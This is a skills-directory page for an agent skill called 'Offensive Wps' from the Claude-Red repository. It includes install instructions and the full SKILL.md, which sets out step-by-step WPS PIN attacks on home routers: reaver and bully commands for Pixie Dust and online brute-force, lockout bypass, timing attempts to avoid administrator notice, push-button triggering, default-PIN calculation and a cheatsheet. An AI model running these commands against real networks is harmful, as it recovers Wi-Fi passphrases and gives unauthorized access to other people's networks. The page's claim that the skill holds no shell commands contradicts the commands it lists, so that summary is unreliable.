Agent skill

Offensive Wps

by SnailSploit in SnailSploit/Claude-Red

WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…

MITAuto-check: notesSecurity

Install Offensive Wps

skills CLI
$ npx skills add SnailSploit/Claude-Red --skill offensive-wps -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install SnailSploit/Claude-Red offensive-wps --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .claude/skills && cp -r skills-src/Skills/wireless/offensive-wps .claude/skills/offensive-wps && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
offensive-wps
GitHub stars
7.3k
Token cost
~1.5k tokens
SKILL.md length
521 words
Files
1
Skills in repo
10
Repo updated
First seen
Licence
MIT

At a glance

WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…

  • Works in 4 steps: Detect WPS-enabled APs (look for the WPS… → Try Pixie Dust first — offline,… → If chipset isn't vulnerable, check… → …
  • A target SOHO router exposes WPS — common on consumer ISP gear
  • SKILL.md covers Quick Workflow, Detection, Pixie Dust (Offline) and Online PIN Brute-Force, plus 5 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md

What it does

Offensive Wps is an agent skill from SnailSploit/Claude-Red. WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation. Use when a target SOHO router exposes WPS — common on consumer ISP gear, often left enabled by default even when WPS attacks have been known for over a decade.

Its SKILL.md is about 1.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security. The repository describes itself as: claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level… The licence is MIT.

When your agent uses it

  • A target SOHO router exposes WPS — common on consumer ISP gear
  • Often left enabled by default even when WPS attacks have been known for over a decade

Example prompts

  • “/offensive-wps”

Workflow steps

4 steps, taken from the first numbered list in SKILL.md.

  1. Detect WPS-enabled APs (look for the WPS IE in beacons)
  2. Try Pixie Dust first — offline, undetectable, instantaneous when it works
  3. If chipset isn't vulnerable, check whether online brute is feasible (lockout policy)
  4. Online brute as last resort, slow and detectable

What it can do on your machine

Read from SKILL.md and the folder at commit 739512a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md (its code samples are bash).

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Offensive Wps loads about 1.5k tokens when it runs. Until then it costs about 117 tokens; SKILL.md has 521 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~117
When it runs · the whole SKILL.md, loaded when a task matches
~1.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:23
    sudo wash -i wlan0mon
  • NoteRuns commands with sudoSKILL.md:26
    sudo airodump-ng wlan0mon --wps
  • NoteRuns commands with sudoSKILL.md:39
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
  • NoteRuns commands with sudoSKILL.md:42
    sudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
  • NoteRuns commands with sudoSKILL.md:69
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \
  • NoteRuns commands with sudoSKILL.md:109
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '00000000' -P
  • NoteRuns commands with sudoSKILL.md:139
    sudo airmon-ng check kill && sudo airmon-ng start wlan0
  • NoteRuns commands with sudoSKILL.md:142
    sudo wash -i wlan0mon
  • NoteRuns commands with sudoSKILL.md:145
    sudo reaver -i wlan0mon -b <BSSID> -K 1 -vvv
  • NoteRuns commands with sudoSKILL.md:151
    sudo reaver -i wlan0mon -b <BSSID> -L -N -d 15 -t 30 -r 3:30 -vv

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from SnailSploit/Claude-Red at commit 739512a, republished under its MIT licence (© SnailSploit). 521 words, ~1,458 tokens.

Download SKILL.mdSave it as .claude/skills/offensive-wps/SKILL.md (or your agent's skills folder).
name
offensive-wps
description
WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation. Use when a target SOHO router exposes WPS — common on consumer ISP gear, often left enabled by default even when WPS attacks have been known for over a decade.

WPS PIN Attacks

WPS converts an 8-digit PIN into the network PSK via the M3/M4 message exchange. The PIN is split into 4-digit + 3-digit halves (the 8th digit is a checksum), giving only 11,000 effective combinations — and on vulnerable chipsets, the offline Pixie Dust attack recovers the PIN in seconds without ever sending an online attempt.

Quick Workflow

  1. Detect WPS-enabled APs (look for the WPS IE in beacons)
  2. Try Pixie Dust first — offline, undetectable, instantaneous when it works
  3. If chipset isn't vulnerable, check whether online brute is feasible (lockout policy)
  4. Online brute as last resort, slow and detectable

Detection

bash
# wash — dedicated WPS scanner
sudo wash -i wlan0mon

# Or use airodump-ng with WPS column
sudo airodump-ng wlan0mon --wps

Output includes: WPS version (1.0 / 2.0), Locked status, Configured/Unconfigured, vendor.

WPS 2.0 introduced lockout enforcement, but many consumer APs still implement it as "lock for 60 seconds after 3 failures" — easily bypassed by waiting.

Pixie Dust (Offline)

The Pixie Dust attack exploits weak nonce generation in WPS-implementing chipsets. The attack captures one full WPS handshake (M1-M4) and then offline-computes the PIN.

bash
# reaver with Pixie Dust mode
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv

# bully alternative
sudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
ChipsetVulnerable?
Ralink (RT chipsets)Yes — most older D-Link, TP-Link, Edimax
Realtek (RTL8xxx)Yes — many TRENDnet, Belkin
Broadcom (older firmware)Often yes — specific model + firmware revs
MediaTek (specific revs)Mixed
AtherosMostly patched

When successful:

[Pixie-Dust] WPS PIN: 12345670
[Pixie-Dust] WPA PSK: ActualPasswordHere
[Pixie-Dust] AP SSID: HomeWiFi

The PIN gives you the PSK directly via the M7 message — no PSK cracking needed.

Online PIN Brute-Force

When Pixie Dust fails, online brute is the fallback. Send EAPOL-Start → M1 → M2 → M3 attempts with successive PINs.

bash
# reaver online mode (default)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \
  -L -N -d 15 -t 30 -T .5 -r 3:30 -vv

# Flags:
# -L : ignore failed lockouts
# -N : don't send NACK packets
# -d 15 : 15-second delay between attempts
# -t 30 : timeout
# -T .5 : timeout for receiving M5/M7
# -r 3:30 : pause 30s every 3 attempts
Lockout Handling

Most modern APs lock WPS after a few failed PINs. Detect lockout:

  • AP stops responding to EAPOL-Start
  • WPS Locked flag in beacon switches to Yes

Strategies:

  • Wait it out: many APs auto-unlock after 60–600 seconds. Set -r accordingly.
  • Reboot the AP: physically resets state. Only works if you have authorization for that disruption.
  • Spread attempts across time of day: low-traffic windows to avoid coincident legitimate WPS use that triggers admin attention.
Show full SKILL.md (213 more words)Show less
Time Estimate
  • 11,000 attempts × (delay + timeout) ≈ best case 4 hours, realistic 12–24 hours
  • Lockout multiplier: 5–20x depending on policy
  • Pixie Dust beats this by minutes when vulnerable. Always try first.

Push-Button (PBC) Method

WPS PBC opens a 120-second window after the user presses the button on the AP. During this window any client requesting WPS is paired without PIN.

Attack viability:

  • Practically: requires either physical access to push the button (= you've already won) or social engineering ("the IT guy will press the button at 14:00")
  • Some buggy APs have a permanent PBC window — test by sending PBC association
bash
# Trigger PBC pairing attempt
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '00000000' -P

PIN-Default Patterns

Some vendors derive the WPS PIN from MAC + serial. With known algorithms:

bash
# wpscalc / WPSPIN — calculate likely PINs from BSSID
wpspin --bssid AA:BB:CC:DD:EE:FF
# Outputs candidate PINs to try first before brute

Hit rate is high on certain Belkin, ZyXEL, and Linksys models.

Detection Considerations

SignalDefender View
Reaver/bully traffic patternWIPS rule: rapid WPS exchange attempts
PIN failures spikeWPS Locked flag flip
Vendor PSK leaked offlineUndetectable — Pixie Dust is offline
Consumer admin interface"WPS attempt" might log if AP has audit features (rare)

Pixie Dust against a vulnerable chipset is essentially undetectable from the wire perspective — only one WPS exchange happens, identical to a legitimate client.

Engagement Cheatsheet

bash
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0

# 2. Find WPS APs
sudo wash -i wlan0mon

# 3. Pixie Dust first
sudo reaver -i wlan0mon -b <BSSID> -K 1 -vvv

# 4. If Pixie Dust fails, try vendor-specific PIN candidates
wpspin --bssid <BSSID> | head -10

# 5. Online brute as last resort
sudo reaver -i wlan0mon -b <BSSID> -L -N -d 15 -t 30 -r 3:30 -vv

# 6. Once PIN known, derive PSK from M7 message
# (reaver does this automatically; bully prints PSK on success)

Key References

© SnailSploit, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in Skills/wireless/offensive-wps of SnailSploit/Claude-Red.

Open the folder on GitHubat commit 739512a

Compare with similar skills

Offensive Wps next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Offensive Wps compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Offensive Wps this skillSnailSploit/Claude-Red7.3k—~1.5kAutomated safety check: NotesMIT
Fla Ascend Performancefla-org/flash-linear-attention5.8k—~5.6kAutomated safety check: PassMIT
Deepsec Documentation Guidevercel-labs/deepsec8.1k—~956Automated safety check: PassApache-2.0
Skill Scannergetsentry/skills1k4 repos~2.5kAutomated safety check: WarnApache-2.0
Serenity Aleabitoreddityan-labs/serenity-aleabitoreddit4791 repos~3.3kAutomated safety check: PassNone
Security Alert Triageelastic/agent-skills5921 repos~3.5kAutomated safety check: NotesApache-2.0

Similar skills

  • Fla Ascend Performance

    fla-org/flash-linear-attention

    Guidelines for Ascend NPU kernel / Triton-Ascend backend performance work in the FLA repo.

    5.8k GitHub stars~5.6k tokensUpdated yesterday
    SecurityAuto-check passed
  • Deepsec Documentation Guide

    vercel-labs/deepsec

    Official

    Points the agent at deepsec's own docs to answer questions about initializing, configuring, resuming, scanning with and extending the vulnerability scanner.

    8.1k GitHub stars~956 tokensUpdated 8 days ago
    SecurityAuto-check passed
  • Skill Scanner

    getsentry/skills

    Official

    Scan agent skills for security issues. An agent skill from getsentry/skills.

    1k GitHub starsUsed in 4 repos~2.5k tokens
    SecurityAuto-check: warnings
  • Serenity Aleabitoreddit

    yan-labs/serenity-aleabitoreddit

    Apply trader Serenity's (@aleabitoreddit) AI/semiconductor supply-chain analytical lens to US-stock ideas and market judgment.

    479 GitHub starsUsed in 1 repo~3.3k tokens
    SecurityAuto-check passed
  • Security Alert Triage

    elastic/agent-skills

    Official

    Triage Elastic Security alerts — gather context, classify threats, create cases, and acknowledge.

    592 GitHub starsUsed in 1 repo~3.5k tokens
    SecurityAuto-check: notes
  • Shiro Attack CLI

    SummerSec/ShiroAttack2

    当用户要求利用、检测或测试 Apache Shiro rememberMe 反序列化漏洞 (Shiro-550, CVE-2016-4437) 时使用。触发词包括 "Shiro"、"rememberMe"、"shiro attack"、"CVE-2016-4437"、"Shiro-550"、"爆破 Shiro key"、"利用 Shiro"、"Shiro…

    2.6k GitHub stars~945 tokensUpdated 4 mo ago
    SecurityAuto-check passed

More from SnailSploit/Claude-Red

All 10 skills in this repo
  • Offensive Krack Fragattacks

    SnailSploit/Claude-Red

    KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.

    7.3k GitHub stars~1.1k tokensUpdated 17 days ago
    Auto-check: notes
  • Offensive Fuzzing

    SnailSploit/Claude-Red

    Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies…

    7.3k GitHub stars~3k tokensUpdated 17 days ago
    Auto-check: warnings
  • Offensive Lorawan Sub Ghz

    SnailSploit/Claude-Red

    LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz…

    7.3k GitHub stars~1.7k tokensUpdated 17 days ago
    Auto-check passed
  • Offensive Mobile

    SnailSploit/Claude-Red

    Mobile (Android + iOS) application penetration testing methodology.

    7.3k GitHub stars~3.5k tokensUpdated 17 days ago
    Auto-check passed
  • Offensive Wifi

    SnailSploit/Claude-Red

    Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.

    7.3k GitHub stars~2.8k tokensUpdated 17 days ago
    Auto-check: notes
  • Offensive Z Wave

    SnailSploit/Claude-Red

    Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection…

    7.3k GitHub stars~1.3k tokensUpdated 17 days ago
    Auto-check passed

Categories

Questions about Offensive Wps

What does Offensive Wps do?

WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…. Offensive Wps is an agent skill from SnailSploit/Claude-Red. WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation.

When should I use Offensive Wps?

Offensive Wps fits situations like: A target SOHO router exposes WPS — common on consumer ISP gear; often left enabled by default even when WPS attacks have been known for over a decade.

How do I install Offensive Wps in Claude Code?

Run `npx skills add SnailSploit/Claude-Red --skill offensive-wps -a claude-code`. Or copy the skill folder (Skills/wireless/offensive-wps in SnailSploit/Claude-Red) into .claude/skills/offensive-wps in your project. Claude Code loads it when a task matches its description.

How do I install Offensive Wps in Codex?

Run `npx skills add SnailSploit/Claude-Red --skill offensive-wps -a codex`. Or copy the skill folder (Skills/wireless/offensive-wps in SnailSploit/Claude-Red) into .agents/skills/offensive-wps in your project. Codex loads it when a task matches its description.

Can I use Offensive Wps in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add SnailSploit/Claude-Red --skill offensive-wps -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/offensive-wps, .gemini/skills/offensive-wps, .github/skills/offensive-wps and .opencode/skills/offensive-wps in your project.

What does Offensive Wps need to run?

SKILL.md names no scripts, command-line tools or credentials: Offensive Wps is instructions for the agent only.

Does Offensive Wps access the network?

SKILL.md names 1 domain. As links in the text: github.com. This is read from the text; nothing was executed.

Is Offensive Wps safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.

What licence does Offensive Wps use?

Offensive Wps is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Offensive Wps use?

About 1.5k tokens (SKILL.md is roughly 5.8k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Offensive Wps?

Skills that share tags, products or a category with Offensive Wps: Fla Ascend Performance (fla-org/flash-linear-attention, 5.8k stars), Deepsec Documentation Guide (vercel-labs/deepsec, 8.1k stars), Skill Scanner (getsentry/skills, 1k stars) and Serenity Aleabitoreddit (yan-labs/serenity-aleabitoreddit, 479 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Offensive Wps?

SnailSploit (a GitHub user) maintains it in SnailSploit/Claude-Red, which has 7,321 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on September 19, 2026.

Source: SnailSploit/Claude-Red on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.